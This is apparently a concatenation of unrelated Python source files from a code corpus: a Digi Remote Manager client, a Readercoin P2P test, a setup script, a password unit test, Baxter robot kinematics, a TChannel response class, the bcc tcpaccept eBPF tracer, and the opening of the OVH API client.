- Documentation does require an account to access
Use with samples/cellular/remotemanager/rm_sample.py.
"""
import ubinascii
import urequests
class AuthorizationException(Exception):
pass
STREAMS_URI = "https://remotemanager.digi.com/ws/v1/streams/"
class RemoteManagerConnection:
def __init__(self, credentials, auth_scheme="Basic"):
if not credentials:
self.auth = None
else:
self.set_auth(credentials, auth_scheme)
def set_auth(self, credentials, auth_scheme="Basic"):
if auth_scheme == "Basic":
self.auth = "Basic " + ubinascii.b2a_base64(credentials['username'] + ":" + credentials['password']).decode().strip()
elif auth_scheme == "Bearer":
self.auth = "Bearer " + credentials['token']
else:
raise AuthorizationException("Unsupported authorization scheme: " + auth_scheme)
@staticmethod
def check_response_code(response):
if response.status_code not in (200, 201, 204):
raise ConnectionError("Bad HTTP response status code: " + str(response.status_code))
else:
return response
def set_headers(self, headers):
if not self.auth:
raise AuthorizationException("No authorization credentials provided")
headers = dict() if headers is None else headers
headers['Authorization'] = self.auth
return headers
def get_datastreams(self, headers=None):
headers = self.set_headers(headers)
response = urequests.get(STREAMS_URI + "inventory.json", headers=headers)
self.check_response_code(response)
return [stream['id'] for stream in response.json()['list']]
def get_datastream_info(self, stream_id, headers=None):
headers = self.set_headers(headers)
response = urequests.get(STREAMS_URI + "inventory/" + stream_id + ".json", headers=headers)
return self.check_response_code(response)
def update_datastream(self, stream_id, json, headers=None):
headers = self.set_headers(headers)
response = urequests.put(STREAMS_URI + "inventory/" + stream_id, headers=headers, json=json)
return self.check_response_code(response)
def create_datastream(self, json, headers=None):
headers = self.set_headers(headers)
response = urequests.post(STREAMS_URI + "inventory/", headers=headers, json=json)
return self.check_response_code(response)
def delete_datastream(self, stream_id, headers=None):
headers = self.set_headers(headers)
response = urequests.delete(STREAMS_URI + "inventory/" + stream_id, headers=headers)
return self.check_response_code(response)
def add_datapoint(self, stream_id, value, headers=None):
headers = self.set_headers(headers)
response = urequests.post(STREAMS_URI + "history/", headers=headers, json={"stream_id": stream_id, "value": value})
return self.check_response_code(response)
def delete_datapoint(self, stream_id, start_time=None, end_time=None, headers=None):
headers = self.set_headers(headers)
response = urequests.delete(STREAMS_URI + "history/" + stream_id, params={"start_time": start_time, "end_time": end_time}, headers=headers)
return self.check_response_code(response)
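# A minimal usage sketch (the credentials and stream id below are made-up
# placeholders, not real values); it mirrors the flow of the sample script
# referenced in the module docstring:
#
#   credentials = {'username': 'my_user', 'password': 'my_password'}
#   rm = RemoteManagerConnection(credentials)
#   rm.add_datapoint("my_stream", 21.5)
#   print(rm.get_datastreams())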
|
py
|
1a5f1b405a46acd18d13d5bdedd7aac330031664
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Readercoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests NODE_NETWORK_LIMITED.
Tests that a node configured with -prune=550 signals NODE_NETWORK_LIMITED correctly
and that it responds to getdata requests for blocks correctly:
- send a block within 288 + 2 of the tip
- disconnect peers who request blocks older than that."""
from test_framework.messages import CInv, msg_getdata, msg_verack, NODE_BLOOM, NODE_NETWORK_LIMITED, NODE_WITNESS
from test_framework.mininode import P2PInterface, mininode_lock
from test_framework.test_framework import ReadercoinTestFramework
from test_framework.util import assert_equal, disconnect_nodes, connect_nodes_bi, sync_blocks, wait_until
class P2PIgnoreInv(P2PInterface):
firstAddrnServices = 0
def on_inv(self, message):
# The node will send us invs for other blocks. Ignore them.
pass
def on_addr(self, message):
self.firstAddrnServices = message.addrs[0].nServices
def wait_for_addr(self, timeout=5):
test_function = lambda: self.last_message.get("addr")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def send_getdata_for_block(self, blockhash):
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(2, int(blockhash, 16)))
self.send_message(getdata_request)
class NodeNetworkLimitedTest(ReadercoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [['-prune=550', '-addrmantest'], [], []]
def disconnect_all(self):
disconnect_nodes(self.nodes[0], 1)
disconnect_nodes(self.nodes[1], 0)
disconnect_nodes(self.nodes[2], 1)
disconnect_nodes(self.nodes[2], 0)
disconnect_nodes(self.nodes[0], 2)
disconnect_nodes(self.nodes[1], 2)
def setup_network(self):
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
def run_test(self):
node = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
expected_services = NODE_BLOOM | NODE_WITNESS | NODE_NETWORK_LIMITED
self.log.info("Check that node has signalled expected services.")
assert_equal(node.nServices, expected_services)
self.log.info("Check that the localservices is as expected.")
assert_equal(int(self.nodes[0].getnetworkinfo()['localservices'], 16), expected_services)
self.log.info("Mine enough blocks to reach the NODE_NETWORK_LIMITED range.")
connect_nodes_bi(self.nodes, 0, 1)
blocks = self.nodes[1].generatetoaddress(292, self.nodes[1].get_deterministic_priv_key().address)
sync_blocks([self.nodes[0], self.nodes[1]])
self.log.info("Make sure we can max retrieve block at tip-288.")
node.send_getdata_for_block(blocks[1]) # last block in valid range
node.wait_for_block(int(blocks[1], 16), timeout=3)
self.log.info("Requesting block at height 2 (tip-289) must fail (ignored).")
node.send_getdata_for_block(blocks[0]) # first block outside of the 288+2 limit
node.wait_for_disconnect(5)
self.log.info("Check local address relay, do a fresh connection.")
self.nodes[0].disconnect_p2ps()
node1 = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
node1.send_message(msg_verack())
node1.wait_for_addr()
#must relay address with NODE_NETWORK_LIMITED
assert_equal(node1.firstAddrnServices, 1036)
self.nodes[0].disconnect_p2ps()
node1.wait_for_disconnect()
# connect unsynced node 2 with pruned NODE_NETWORK_LIMITED peer
# because node 2 is in IBD and node 0 is a NODE_NETWORK_LIMITED peer, sync must not be possible
connect_nodes_bi(self.nodes, 0, 2)
try:
sync_blocks([self.nodes[0], self.nodes[2]], timeout=5)
except:
pass
# node2 must remain at height 0
assert_equal(self.nodes[2].getblockheader(self.nodes[2].getbestblockhash())['height'], 0)
# now connect also to node 1 (non pruned)
connect_nodes_bi(self.nodes, 1, 2)
# sync must be possible
sync_blocks(self.nodes)
# disconnect all peers
self.disconnect_all()
# mine 10 blocks on node 0 (pruned node)
self.nodes[0].generatetoaddress(10, self.nodes[0].get_deterministic_priv_key().address)
# connect node1 (non pruned) with node0 (pruned) and check if they can sync
connect_nodes_bi(self.nodes, 0, 1)
# sync must be possible, node 1 is no longer in IBD and should therefore connect to node 0 (NODE_NETWORK_LIMITED)
sync_blocks([self.nodes[0], self.nodes[1]])
if __name__ == '__main__':
NodeNetworkLimitedTest().main()
|
py
|
1a5f1b8a605be80bdcce79f35fa3d42c689aeb28
|
#!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def get_version():
with open('VERSION', 'r') as f:
version_str = f.read().strip()
assert version_str
return version_str
setup(
name='telega-compose',
version=get_version(),
description='Utility to render docker-compose files with different states',
long_description=open('README.rst', 'r').read(),
author='Django Stars',
author_email='[email protected]',
url='https://github.com/django-stars/telega-compose',
packages=['telega_compose'],
entry_points="""
[console_scripts]
tcompose=telega_compose.main:cli
""",
install_requires=open('requirements.txt', 'r').readlines(),
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Utilities',
]
)
|
py
|
1a5f1be5d55fe6ceccf2100cd007d79fd6a945dc
|
import unittest
from dbas.handler import password
class PasswordHandlerTests(unittest.TestCase):
def test_get_rnd_passwd(self):
self.assertEqual(len(password.get_rnd_passwd()), 10)
self.assertEqual(len(password.get_rnd_passwd(8)), 8)
# Test that two independently generated passwords differ.
self.assertNotEqual(password.get_rnd_passwd(), password.get_rnd_passwd())
|
py
|
1a5f1becd6ba5853c3365f416503247062726bc5
|
#!/usr/bin/python
# Copyright (c) 2013-2014, Rethink Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import PyKDL
# import rospy
import baxter_interface
from baxter_kdl.kdl_parser import kdl_tree_from_urdf_model
from urdf_parser_py.urdf import URDF
class baxter_kinematics(object):
"""
Baxter Kinematics with PyKDL
"""
def __init__(self, limb):
self._baxter = URDF.from_parameter_server(key='robot_description')
self._kdl_tree = kdl_tree_from_urdf_model(self._baxter)
self._base_link = self._baxter.get_root()
self._tip_link = limb + '_gripper'
self._tip_frame = PyKDL.Frame()
self._arm_chain = self._kdl_tree.getChain(self._base_link,
self._tip_link)
# Baxter Interface Limb Instances
self._limb_interface = baxter_interface.Limb(limb)
self._joint_names = self._limb_interface.joint_names()
self._num_jnts = len(self._joint_names)
# Store joint information for future use
self.get_joint_information()
# KDL Solvers
self._fk_p_kdl = PyKDL.ChainFkSolverPos_recursive(self._arm_chain)
self._fk_v_kdl = PyKDL.ChainFkSolverVel_recursive(self._arm_chain)
self._ik_v_kdl = PyKDL.ChainIkSolverVel_pinv(self._arm_chain)
self._ik_p_kdl = PyKDL.ChainIkSolverPos_NR(self._arm_chain,
self._fk_p_kdl,
self._ik_v_kdl)
self._jac_kdl = PyKDL.ChainJntToJacSolver(self._arm_chain)
self._dyn_kdl = PyKDL.ChainDynParam(self._arm_chain,
PyKDL.Vector.Zero())
def print_robot_description(self):
nf_joints = 0
for j in self._baxter.joints:
if j.type != 'fixed':
nf_joints += 1
print("URDF non-fixed joints: %d;" % nf_joints)
print("URDF total joints: %d" % len(self._baxter.joints))
print("URDF links: %d" % len(self._baxter.links))
print("KDL joints: %d" % self._kdl_tree.getNrOfJoints())
print("KDL segments: %d" % self._kdl_tree.getNrOfSegments())
def print_kdl_chain(self):
for idx in range(self._arm_chain.getNrOfSegments()):
print('* ' + self._arm_chain.getSegment(idx).getName())
def get_joint_information(self):
joints = {}
for j in self._baxter.joints:
if j.type != 'fixed':
joints[j.name] = j
self.joint_limits_lower = []
self.joint_limits_upper = []
self.joint_types = []
for jnt_name in self._joint_names:
jnt = joints[jnt_name]
if jnt.limit is not None:
self.joint_limits_lower.append(jnt.limit.lower)
self.joint_limits_upper.append(jnt.limit.upper)
else:
self.joint_limits_lower.append(None)
self.joint_limits_upper.append(None)
self.joint_types.append(jnt.type)
def replace_none(x, v):
if x is None:
return v
return x
self.joint_limits_lower = np.array([replace_none(jl, -np.inf)
for jl in self.joint_limits_lower])
self.joint_limits_upper = np.array([replace_none(jl, np.inf)
for jl in self.joint_limits_upper])
self.joint_types = np.array(self.joint_types)
def joints_to_kdl(self, type, values=None):
kdl_array = PyKDL.JntArray(self._num_jnts)
if values is None:
if type == 'positions':
cur_type_values = self._limb_interface.joint_angles()
elif type == 'velocities':
cur_type_values = self._limb_interface.joint_velocities()
elif type == 'torques':
cur_type_values = self._limb_interface.joint_efforts()
else:
cur_type_values = values
for idx, name in enumerate(self._joint_names):
kdl_array[idx] = cur_type_values[name]
if type == 'velocities':
kdl_array = PyKDL.JntArrayVel(kdl_array)
return kdl_array
def kdl_to_mat(self, data):
mat = np.mat(np.zeros((data.rows(), data.columns())))
for i in range(data.rows()):
for j in range(data.columns()):
mat[i,j] = data[i,j]
return mat
def forward_position_kinematics(self,joint_values=None):
end_frame = PyKDL.Frame()
self._fk_p_kdl.JntToCart(self.joints_to_kdl('positions',joint_values),
end_frame)
pos = end_frame.p
rot = PyKDL.Rotation(end_frame.M)
rot = rot.GetQuaternion()
return np.array([pos[0], pos[1], pos[2],
rot[0], rot[1], rot[2], rot[3]])
def forward_velocity_kinematics(self,joint_velocities=None):
end_frame = PyKDL.FrameVel()
self._fk_v_kdl.JntToCart(self.joints_to_kdl('velocities',joint_velocities),
end_frame)
return end_frame.GetTwist()
def inverse_kinematics(self, position, orientation=None, seed=None, min_joints=None, max_joints=None, maxiter=500, eps=1.0e-6):
ik = PyKDL.ChainIkSolverVel_pinv(self._arm_chain)
pos = PyKDL.Vector(position[0], position[1], position[2])
if orientation is not None:
rot = PyKDL.Rotation()
rot = rot.Quaternion(orientation[0], orientation[1],
orientation[2], orientation[3])
# Populate seed with current angles if not provided
seed_array = PyKDL.JntArray(self._num_jnts)
if seed is not None:
seed_array.resize(len(seed))
for idx, jnt in enumerate(seed):
seed_array[idx] = jnt
else:
seed_array = self.joints_to_kdl('positions')
# Make IK Call
if orientation is not None:
goal_pose = PyKDL.Frame(rot, pos)
else:
goal_pose = PyKDL.Frame(pos)
result_angles = PyKDL.JntArray(self._num_jnts)
# Make IK solver with joint limits
if min_joints is None:
min_joints = self.joint_limits_lower
if max_joints is None:
max_joints = self.joint_limits_upper
mins_kdl = PyKDL.JntArray(len(min_joints))
for idx,jnt in enumerate(min_joints): mins_kdl[idx] = jnt
maxs_kdl = PyKDL.JntArray(len(max_joints))
for idx,jnt in enumerate(max_joints): maxs_kdl[idx] = jnt
ik_p_kdl = PyKDL.ChainIkSolverPos_NR_JL(self._arm_chain, mins_kdl, maxs_kdl,
self._fk_p_kdl, self._ik_v_kdl, maxiter, eps)
if ik_p_kdl.CartToJnt(seed_array, goal_pose, result_angles) >= 0:
result = np.array(list(result_angles))
return result
else:
return None
def jacobian(self,joint_values=None):
jacobian = PyKDL.Jacobian(self._num_jnts)
self._jac_kdl.JntToJac(self.joints_to_kdl('positions',joint_values), jacobian)
return self.kdl_to_mat(jacobian)
def jacobian_transpose(self,joint_values=None):
return self.jacobian(joint_values).T
def jacobian_pseudo_inverse(self,joint_values=None):
return np.linalg.pinv(self.jacobian(joint_values))
def inertia(self,joint_values=None):
inertia = PyKDL.JntSpaceInertiaMatrix(self._num_jnts)
self._dyn_kdl.JntToMass(self.joints_to_kdl('positions',joint_values), inertia)
return self.kdl_to_mat(inertia)
def cart_inertia(self,joint_values=None):
js_inertia = self.inertia(joint_values)
jacobian = self.jacobian(joint_values)
return np.linalg.inv(jacobian * np.linalg.inv(js_inertia) * jacobian.T)
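# A minimal usage sketch (requires a running ROS master with Baxter's
# robot_description on the parameter server; 'right' is just an example limb):
#
#   kin = baxter_kinematics('right')
#   kin.print_robot_description()
#   pose = kin.forward_position_kinematics()           # [x, y, z, qx, qy, qz, qw]
#   angles = kin.inverse_kinematics(pose[:3], pose[3:])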
|
py
|
1a5f1c41e6f4c3e705c360cda0d2e6f7d80357ba
|
# Copyright (c) 2015 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
from . import schemes
from . import transport as t
from .status import OK
__all__ = ['Response']
class Response(object):
"""A TChannel response.
This is sent by handlers and received by callers.
:ivar body:
The payload of this response. The type of this attribute depends on the
scheme being used (e.g., JSON, Thrift, etc.).
:ivar headers:
A dictionary of application headers. This should be a mapping of
strings to strings.
:ivar transport:
Protocol-level transport headers. These are used for routing over
Hyperbahn.
"""
# TODO implement __repr__
__slots__ = (
'body',
'status',
'headers',
'transport',
)
def __init__(self, body=None, headers=None, transport=None, status=None):
if status is None:
status = OK
self.body = body
self.status = status
self.headers = headers
self.transport = transport
class TransportHeaders(object):
"""Response-specific Transport Headers"""
# TODO implement __repr__
__slots__ = (
'failure_domain',
'scheme',
)
def __init__(self, failure_domain=None, scheme=None):
if scheme is None:
scheme = schemes.RAW
self.failure_domain = failure_domain
self.scheme = scheme
@classmethod
def from_dict(cls, data):
return cls(
failure_domain=data.get(t.FAILURE_DOMAIN),
scheme=data.get(t.SCHEME),
)
def to_dict(self):
m = {}
if self.failure_domain is not None:
m[t.FAILURE_DOMAIN] = self.failure_domain
if self.scheme is not None:
m[t.SCHEME] = self.scheme
return m
def response_from_mixed(mixed):
"""Create Response from mixed input."""
# if none then give empty Response
if mixed is None:
return Response()
# if not Response, then treat like body
if not isinstance(mixed, Response):
return Response(mixed)
# it's already a Response
return mixed
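# A minimal sketch of how a handler's return value is normalized (the body and
# header values are made-up examples):
#
#   response_from_mixed(None)                    # -> empty Response()
#   response_from_mixed({'ok': True})            # -> Response(body={'ok': True})
#   response_from_mixed(Response(body='hi'))     # -> returned unchanged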
|
py
|
1a5f1c7b527113e417fc8cf307ca9a4a55c04fb4
|
#!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# tcpaccept Trace TCP accept()s.
# For Linux, uses BCC, eBPF. Embedded C.
#
# USAGE: tcpaccept [-h] [-T] [-t] [-p PID] [-P PORTS]
#
# This uses dynamic tracing of the kernel inet_csk_accept() socket function
# (from tcp_prot.accept), and will need to be modified to match kernel changes.
#
# Copyright (c) 2015 Brendan Gregg.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 13-Oct-2015 Brendan Gregg Created this.
# 14-Feb-2016 " " Switch to bpf_perf_output.
from __future__ import print_function
from bcc.containers import filter_by_containers
from bcc import BPF
from socket import inet_ntop, AF_INET, AF_INET6
from struct import pack
import argparse
from bcc.utils import printb
from time import strftime
# arguments
examples = """examples:
./tcpaccept # trace all TCP accept()s
./tcpaccept -t # include timestamps
./tcpaccept -P 80,81 # only trace port 80 and 81
./tcpaccept -p 181 # only trace PID 181
./tcpaccept --cgroupmap mappath # only trace cgroups in this BPF map
./tcpaccept --mntnsmap mappath # only trace mount namespaces in the map
"""
parser = argparse.ArgumentParser(
description="Trace TCP accepts",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-T", "--time", action="store_true",
help="include time column on output (HH:MM:SS)")
parser.add_argument("-t", "--timestamp", action="store_true",
help="include timestamp on output")
parser.add_argument("-p", "--pid",
help="trace this PID only")
parser.add_argument("-P", "--port",
help="comma-separated list of local ports to trace")
parser.add_argument("--cgroupmap",
help="trace cgroups in this BPF map only")
parser.add_argument("--mntnsmap",
help="trace mount namespaces in this BPF map only")
parser.add_argument("--ebpf", action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
debug = 0
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
// separate data structs for ipv4 and ipv6
struct ipv4_data_t {
u64 ts_us;
u32 pid;
u32 saddr;
u32 daddr;
u64 ip;
u16 lport;
u16 dport;
char task[TASK_COMM_LEN];
};
BPF_PERF_OUTPUT(ipv4_events);
struct ipv6_data_t {
u64 ts_us;
u32 pid;
unsigned __int128 saddr;
unsigned __int128 daddr;
u64 ip;
u16 lport;
u16 dport;
char task[TASK_COMM_LEN];
};
BPF_PERF_OUTPUT(ipv6_events);
"""
#
# The following code uses kprobes to instrument inet_csk_accept().
# On Linux 4.16 and later, we could use sock:inet_sock_set_state
# tracepoint for efficiency, but it may output wrong PIDs. This is
# because sock:inet_sock_set_state may run outside of process context.
# Hence, we stick to kprobes until we find a proper solution.
#
bpf_text_kprobe = """
int kretprobe__inet_csk_accept(struct pt_regs *ctx)
{
if (container_should_be_filtered()) {
return 0;
}
struct sock *newsk = (struct sock *)PT_REGS_RC(ctx);
u32 pid = bpf_get_current_pid_tgid() >> 32;
##FILTER_PID##
if (newsk == NULL)
return 0;
// check this is TCP
u8 protocol = 0;
// workaround for reading the sk_protocol bitfield:
// The following comments were added by Joe Yin:
// Unfortunately, the old workaround (reading next to sk_wmem_queued) no
// longer works since Linux 4.10, because sk_wmem_queued no longer directly
// follows the sk_protocol bitfield; the member that now follows it is
// sk_gso_max_segs. So on 4.10+ we can read the protocol with:
//   bpf_probe_read_kernel(&protocol, 1, (void *)((u64)&newsk->sk_gso_max_segs) - 3);
// To tell pre-4.10 and 4.10+ kernels apart, we compare the offsets of
// sk_gso_max_segs and sk_lingertime: sk_lingertime sits close to
// sk_gso_max_segs, and on 4.10+ the offset between the two members is 4.
int gso_max_segs_offset = offsetof(struct sock, sk_gso_max_segs);
int sk_lingertime_offset = offsetof(struct sock, sk_lingertime);
if (sk_lingertime_offset - gso_max_segs_offset == 4)
// 4.10+ with little endian
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
protocol = *(u8 *)((u64)&newsk->sk_gso_max_segs - 3);
else
// pre-4.10 with little endian
protocol = *(u8 *)((u64)&newsk->sk_wmem_queued - 3);
#elif __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__
// 4.10+ with big endian
protocol = *(u8 *)((u64)&newsk->sk_gso_max_segs - 1);
else
// pre-4.10 with big endian
protocol = *(u8 *)((u64)&newsk->sk_wmem_queued - 1);
#else
# error "Fix your compiler's __BYTE_ORDER__?!"
#endif
if (protocol != IPPROTO_TCP)
return 0;
// pull in details
u16 family = 0, lport = 0, dport;
family = newsk->__sk_common.skc_family;
lport = newsk->__sk_common.skc_num;
dport = newsk->__sk_common.skc_dport;
dport = ntohs(dport);
##FILTER_PORT##
if (family == AF_INET) {
struct ipv4_data_t data4 = {.pid = pid, .ip = 4};
data4.ts_us = bpf_ktime_get_ns() / 1000;
data4.saddr = newsk->__sk_common.skc_rcv_saddr;
data4.daddr = newsk->__sk_common.skc_daddr;
data4.lport = lport;
data4.dport = dport;
bpf_get_current_comm(&data4.task, sizeof(data4.task));
ipv4_events.perf_submit(ctx, &data4, sizeof(data4));
} else if (family == AF_INET6) {
struct ipv6_data_t data6 = {.pid = pid, .ip = 6};
data6.ts_us = bpf_ktime_get_ns() / 1000;
bpf_probe_read_kernel(&data6.saddr, sizeof(data6.saddr),
&newsk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
bpf_probe_read_kernel(&data6.daddr, sizeof(data6.daddr),
&newsk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
data6.lport = lport;
data6.dport = dport;
bpf_get_current_comm(&data6.task, sizeof(data6.task));
ipv6_events.perf_submit(ctx, &data6, sizeof(data6));
}
// else drop
return 0;
}
"""
bpf_text += bpf_text_kprobe
# code substitutions
if args.pid:
bpf_text = bpf_text.replace('##FILTER_PID##',
'if (pid != %s) { return 0; }' % args.pid)
else:
bpf_text = bpf_text.replace('##FILTER_PID##', '')
if args.port:
lports = [int(lport) for lport in args.port.split(',')]
lports_if = ' && '.join(['lport != %d' % lport for lport in lports])
bpf_text = bpf_text.replace('##FILTER_PORT##',
'if (%s) { return 0; }' % lports_if)
bpf_text = filter_by_containers(args) + bpf_text
if debug or args.ebpf:
print(bpf_text)
if args.ebpf:
exit()
bpf_text = bpf_text.replace('##FILTER_PORT##', '')
# process event
def print_ipv4_event(cpu, data, size):
event = b["ipv4_events"].event(data)
global start_ts
if args.time:
printb(b"%-9s" % strftime("%H:%M:%S").encode('ascii'), nl="")
if args.timestamp:
if start_ts == 0:
start_ts = event.ts_us
printb(b"%-9.3f" % ((float(event.ts_us) - start_ts) / 1000000), nl="")
printb(b"%-7d %-12.12s %-2d %-16s %-5d %-16s %-5d" % (event.pid,
event.task, event.ip,
inet_ntop(AF_INET, pack("I", event.daddr)).encode(),
event.dport,
inet_ntop(AF_INET, pack("I", event.saddr)).encode(),
event.lport))
def print_ipv6_event(cpu, data, size):
event = b["ipv6_events"].event(data)
global start_ts
if args.time:
printb(b"%-9s" % strftime("%H:%M:%S").encode('ascii'), nl="")
if args.timestamp:
if start_ts == 0:
start_ts = event.ts_us
printb(b"%-9.3f" % ((float(event.ts_us) - start_ts) / 1000000), nl="")
printb(b"%-7d %-12.12s %-2d %-16s %-5d %-16s %-5d" % (event.pid,
event.task, event.ip,
inet_ntop(AF_INET6, event.daddr).encode(),
event.dport,
inet_ntop(AF_INET6, event.saddr).encode(),
event.lport))
# initialize BPF
b = BPF(text=bpf_text)
# header
if args.time:
print("%-9s" % ("TIME"), end="")
if args.timestamp:
print("%-9s" % ("TIME(s)"), end="")
print("%-7s %-12s %-2s %-16s %-5s %-16s %-5s" % ("PID", "COMM", "IP", "RADDR",
"RPORT", "LADDR", "LPORT"))
start_ts = 0
# read events
b["ipv4_events"].open_perf_buffer(print_ipv4_event)
b["ipv6_events"].open_perf_buffer(print_ipv6_event)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
|
py
|
1a5f1d57e57264a5414884ffc30e494cb7f83cda
|
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2013-2017, OVH SAS.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of OVH SAS nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY OVH SAS AND CONTRIBUTORS ````AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL OVH SAS AND CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module provides a simple python wrapper over the OVH REST API.
It handles requesting credential, signing queries...
- To get your API keys: https://eu.api.ovh.com/createApp/
- To get started with API: https://api.ovh.com/g934.first_step_with_api
"""
import hashlib
import urllib
import keyword
import time
import json
try:
from urllib import urlencode
except ImportError: # pragma: no cover
# Python 3
from urllib.parse import urlencode
from .vendor.requests import request, Session
from .vendor.requests.packages import urllib3
from .vendor.requests.exceptions import RequestException
# Disable pyopenssl. It breaks SSL connection pool when SSL connection is
# closed unexpectedly by the server. And we don't need SNI anyway.
try:
from .vendor.requests.packages.urllib3.contrib import pyopenssl
pyopenssl.extract_from_urllib3()
except ImportError:
pass
# Disable SNI related Warning. The API does not rely on it
urllib3.disable_warnings(urllib3.exceptions.SNIMissingWarning)
urllib3.disable_warnings(urllib3.exceptions.SecurityWarning)
from .config import config
from .consumer_key import ConsumerKeyRequest
from .exceptions import (
APIError, NetworkError, InvalidResponse, InvalidRegion, InvalidKey,
ResourceNotFoundError, BadParametersError, ResourceConflictError, HTTPError,
NotGrantedCall, NotCredential, Forbidden, InvalidCredential,
)
#: Mapping between OVH API region names and corresponding endpoints
ENDPOINTS = {
'ovh-eu': 'https://eu.api.ovh.com/1.0',
'ovh-ca': 'https://ca.api.ovh.com/1.0',
'kimsufi-eu': 'https://eu.api.kimsufi.com/1.0',
'kimsufi-ca': 'https://ca.api.kimsufi.com/1.0',
'soyoustart-eu': 'https://eu.api.soyoustart.com/1.0',
'soyoustart-ca': 'https://ca.api.soyoustart.com/1.0',
}
#: Default timeout for each request. 180 seconds connect, 180 seconds read.
TIMEOUT = 180
class Client(object):
"""
Low level OVH Client. It abstracts all the authentication and request
signing logic along with some nice tools helping with key generation.
